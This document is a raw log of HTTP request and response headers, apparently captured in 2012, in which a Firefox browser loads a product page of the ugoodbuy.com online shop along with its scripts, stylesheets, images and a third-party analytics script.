Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Last-Modified: Thu, 01 Nov 2012 12:00:06 GMT
Etag: &quot;303469-1af5-4cd6dc28d1d80&quot;
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2703
Date: Tue, 06 Nov 2012 22:12:16 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /includes/modules/pages/product_info/jscript_textarea_counter.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:16 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:41:09 GMT
Etag: &quot;9a58fc8-239-4c25183ff351a&quot;
Accept-Ranges: bytes
Content-Length: 569
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
GET /includes/templates/slucky/images/icons/flag/EUR.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:16 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:41 GMT
Etag: &quot;9a5c89e-3e6-4c251c2ab7a40&quot;
Accept-Ranges: bytes
Content-Length: 998
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
GET /includes/templates/slucky/images/icons/flag/GBP.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:16 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:43 GMT
Etag: &quot;9a5c8a1-3ec-4c251c2c9fec0&quot;
Accept-Ranges: bytes
Content-Length: 1004
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
GET /includes/templates/slucky/jscript/jscript_w.autocomplete.pack.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:16 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:14:37 GMT
Etag: &quot;9a60175-1f41-4c251fba85735&quot;
Accept-Ranges: bytes
Content-Length: 8001
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
GET /includes/modules/pages/product_info/jscript_score.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:16 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:41:08 GMT
Etag: &quot;9a58fc5-107b-4c25183e7f900&quot;
Accept-Ranges: bytes
Content-Length: 4219
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
GET /images/global-03Beta.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2012 07:21:08 GMT
Etag: &quot;9a5944c-1532-4c3832ce393cf&quot;
Accept-Ranges: bytes
Content-Length: 5426
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Connection: close
GET /images/lightbox.css HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:57:38 GMT
Etag: &quot;9a59484-bc4-4c251beea2c80&quot;
Accept-Ranges: bytes
Content-Length: 3012
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
GET /images/lightbox.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:57:40 GMT
Etag: &quot;9a59485-51ca-4c251bf08b100&quot;
Accept-Ranges: bytes
Content-Length: 20938
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
GET /images/badges/s/1a/9a/1a9af1f38c6d1238c1cca1b87990a368.png HTTP/1.1

Host: upfront.thefind.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: PWS/8.0.9.6
X-Px: rf-ht lhr-agg-n9 ( origin&gt;CONN)
Etag: &quot;448b6c-244a-4c2e108dd65c0&quot;
Cache-Control: max-age=600
Expires: Tue, 06 Nov 2012 22:22:17 GMT
Age: 0
Content-Length: 9290
Last-Modified: Wed, 20 Jun 2012 05:54:39 GMT
Connection: keep-alive
GET /includes/templates/slucky/jscript/jscript_jquery-min.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:16 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:14:25 GMT
Etag: &quot;9a60153-1fc92-4c251faefc640&quot;
Accept-Ranges: bytes
Content-Length: 130194
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
GET /includes/templates/slucky/images/icons/flag/AUD.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:38 GMT
Etag: &quot;9a5c893-3ec-4c251c28c5477&quot;
Accept-Ranges: bytes
Content-Length: 1004
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=26
Connection: Keep-Alive
GET /includes/templates/slucky/images/icons/flag/CAD.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:39 GMT
Etag: &quot;9a5c897-23e-4c251c28cf5c0&quot;
Accept-Ranges: bytes
Content-Length: 574
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=26
Connection: Keep-Alive
GET /includes/templates/template_default/images/icons/flag/RUB.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:23:37 GMT
Etag: &quot;9a60791-79-4c2521bda3909&quot;
Accept-Ranges: bytes
Content-Length: 121
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
GET /images/img-cartAjaxLoading.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:56:59 GMT
Etag: &quot;9a5945c-355-4c251bc9714c0&quot;
Accept-Ranges: bytes
Content-Length: 853
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
GET /images/no_color.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:08 GMT
Etag: &quot;9a5949b-31-4c251c0b3f000&quot;
Accept-Ranges: bytes
Content-Length: 49
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
GET /includes/templates/template_default/images/icons/flag/BRL.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:23:36 GMT
Etag: &quot;9a6078c-3e0-4c2521bcdd51f&quot;
Accept-Ranges: bytes
Content-Length: 992
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
GET /images/banners/Olympic-Games-Banner_475x35_UGoodBuy.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 10:19:55 GMT
Etag: &quot;9a59526-8d0b-4c52c1eee28c0&quot;
Accept-Ranges: bytes
Content-Length: 36107
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
GET /includes/templates/slucky/jscript/jscript_pommon.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:14:30 GMT
Etag: &quot;9a60162-2835-4c251fb3c1180&quot;
Accept-Ranges: bytes
Content-Length: 10293
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
GET /images/banners/YuanDao-N90II-Tablet-PC-Category-Banner.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Thu, 12 Jul 2012 10:55:27 GMT
Etag: &quot;9a59462-d2eb-4c49fcd1e45c0&quot;
Accept-Ranges: bytes
Content-Length: 53995
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=26
Connection: Keep-Alive
GET /images/icon_zoon.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:56:58 GMT
Etag: &quot;9a5945a-e4-4c251bc87d280&quot;
Accept-Ranges: bytes
Content-Length: 228
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=24
Connection: Keep-Alive
GET /bmz_cache/c/c932df15249873bc4386a136f3ebc5eb.image.48x48.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Sun, 08 Jul 2012 14:13:23 GMT
Etag: &quot;bc3429e-624-4c452199e26c0&quot;
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
GET /images/banners/All-Category-Banner.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Thu, 12 Jul 2012 10:02:50 GMT
Etag: &quot;9a59466-11af2-4c49f10f24680&quot;
Accept-Ranges: bytes
Content-Length: 72434
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=26
Connection: Keep-Alive
GET /9642476.js HTTP/1.1

Host: js.users.51.la

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Cache-Control: max-age=300
Content-Length: 1941
Last-Modified: Wed, 19 Sep 2012 15:04:06 GMT
Accept-Ranges: bytes
Etag: &quot;d0c96b37896cd1:809&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Nov 2012 22:15:06 GMT
Connection: close
GET /bmz_cache/1/12faeb9a01e9a75ff008329b94fdc412.image.48x48.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Sun, 08 Jul 2012 14:13:23 GMT
Etag: &quot;bc3429f-53f-4c452199e26c0&quot;
Accept-Ranges: bytes
Content-Length: 1343
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=24
Connection: Keep-Alive
GET /images/v/SGDATIF001/UGB_1204171_1.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2012 04:52:40 GMT
Etag: &quot;9a6dd36-20531-4c38119f8fefe&quot;
Accept-Ranges: bytes
Content-Length: 132401
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=26
Connection: Keep-Alive
GET /bmz_cache/d/d47884d63bb4718f6fd3dbce52caf9dd.image.48x48.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Sun, 08 Jul 2012 14:13:23 GMT
Etag: &quot;bca4120-59d-4c452199e26c0&quot;
Accept-Ranges: bytes
Content-Length: 1437
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
GET /images/banners/ZP500-All-Category-Ads.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Thu, 12 Jul 2012 09:36:39 GMT
Etag: &quot;9a59533-c6a0-4c49eb34eb7c0&quot;
Accept-Ranges: bytes
Content-Length: 50848
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
GET /images/banners/Welcome-Banner_475x35_UGoodBuy.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:17 GMT
Server: Apache
Last-Modified: Wed, 18 Jul 2012 10:14:59 GMT
Etag: &quot;9a59530-a923-4c517ef76a256&quot;
Accept-Ranges: bytes
Content-Length: 43299
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
GET /bmz_cache/6/643dd905578f8b298167c23d8ff2f037.image.48x48.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Sun, 08 Jul 2012 14:13:23 GMT
Etag: &quot;bc6c106-58e-4c452199e26c0&quot;
Accept-Ranges: bytes
Content-Length: 1422
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=23
Connection: Keep-Alive
GET /bmz_cache/7/7a64c42e0231cabd9e5298b775de5045.image.48x48.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Sun, 08 Jul 2012 14:13:23 GMT
Etag: &quot;bc88109-55c-4c452199e26c0&quot;
Accept-Ranges: bytes
Content-Length: 1372
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
GET /bmz_cache/c/c80d9d8383f94339aacccac16a1cd0e3.image.48x48.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Sun, 08 Jul 2012 14:13:23 GMT
Etag: &quot;bc342a0-5a3-4c452199e26c0&quot;
Accept-Ranges: bytes
Content-Length: 1443
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=24
Connection: Keep-Alive
GET /includes/templates/slucky/jscript/jscript_prototype.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Mon, 25 Jun 2012 04:01:27 GMT
Etag: &quot;9a60167-6838-4c344094894ee&quot;
Accept-Ranges: bytes
Content-Length: 26680
Vary: Accept-Encoding
